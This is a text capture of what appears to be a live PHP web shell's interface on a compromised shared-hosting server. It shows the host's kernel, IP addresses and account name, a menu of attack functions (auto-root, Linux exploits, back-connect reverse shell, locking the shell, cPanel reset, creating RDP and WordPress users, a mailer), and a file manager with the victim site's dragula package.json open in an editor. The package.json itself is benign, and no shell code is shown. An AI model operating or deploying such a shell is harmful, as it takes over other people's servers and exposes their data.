Linux premium131.web-hosting.com 4.18.0-553.44.1.lve.el8.x86_64 #1 SMP Thu Mar 13 14:29:12 UTC 2025 x86_64
LiteSpeed
: 162.0.232.56 | : 216.73.216.17
Cant Read [ /etc/named.conf ]
8.1.33
syrihapj
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
syrihapj /
public_html /
node_modules /
dragula /
[ HOME SHELL ]
Name
Size
Permission
Action
.github
[ DIR ]
dr-xr-xr-x
dist
[ DIR ]
dr-xr-xr-x
example
[ DIR ]
dr-xr-xr-x
resources
[ DIR ]
dr-xr-xr-x
test
[ DIR ]
dr-xr-xr-x
.editorconfig
207
B
-rw-r--r--
.jshintignore
43
B
-rw-r--r--
.jshintrc
382
B
-rw-r--r--
.travis.yml
187
B
-rw-r--r--
changelog.markdown
9.84
KB
-rw-r--r--
classes.js
684
B
-rw-r--r--
dragula.js
16.97
KB
-rw-r--r--
dragula.styl
212
B
-rw-r--r--
favicon.ico
32.21
KB
-rw-r--r--
index.html
11.35
KB
-rw-r--r--
license
1.06
KB
-rw-r--r--
package.json
2.01
KB
-rw-r--r--
readme.markdown
16.53
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : package.json
{ "name": "dragula", "version": "3.7.3", "description": "Drag and drop so simple it hurts", "main": "dragula.js", "scripts": { "build": "npm run scripts && npm run styles", "deploy": "npm run build && npm run deployment && npm run sync", "deployment": "git add dist && npm version ${BUMP:-\"patch\"} --no-git-tag-version && git add package.json && git commit -am \"Autogenerated pre-deployment commit\" && git reset HEAD~2 && git add . && git commit -am \"Release $(cat package.json | jq -r .version)\" && git push --tags && npm publish && git push", "scripts": "jshint . && browserify -s dragula -do dist/dragula.js dragula.js && uglifyjs -m -c -o dist/dragula.min.js dist/dragula.js", "start": "watchify -dvo example/example.min.js example/example.js & watchify -dvs dragula -o dist/dragula.js dragula.js & stylus -w dragula.styl --import node_modules/nib -o dist", "styles": "stylus dragula.styl --import node_modules/nib -o dist && cleancss dist/dragula.css -o dist/dragula.min.css", "sync": "git checkout gh-pages ; git merge master ; git push ; git checkout master", "lint": "jshint . --reporter node_modules/jshint-stylish/index.js", "test": "npm run lint && browserify test/*.js | tape-run", "test-watch": "hihat test/*.js -p tap-dev-tool" }, "repository": { "type": "git", "url": "https://github.com/bevacqua/dragula.git" }, "author": "Nicolas Bevacqua <nicolasbevacqua@gmail.com> (http://bevacqua.io/)", "license": "MIT", "bugs": { "url": "https://github.com/bevacqua/dragula/issues" }, "homepage": "https://github.com/bevacqua/dragula", "dependencies": { "contra": "1.9.4", "crossvent": "1.5.5" }, "devDependencies": { "browserify": "16.5.2", "clean-css": "4.2.3", "clean-css-cli": "^4.3.0", "hihat": "2.6.4", "jshint": "2.12.0", "jshint-stylish": "2.2.1", "nib": "1.1.2", "stylus": "0.54.8", "tap-dev-tool": "1.3.0", "tape": "5.0.1", "tape-run": "8.0.0", "uglify-js": "3.11.0", "watchify": "3.11.1" } }
Close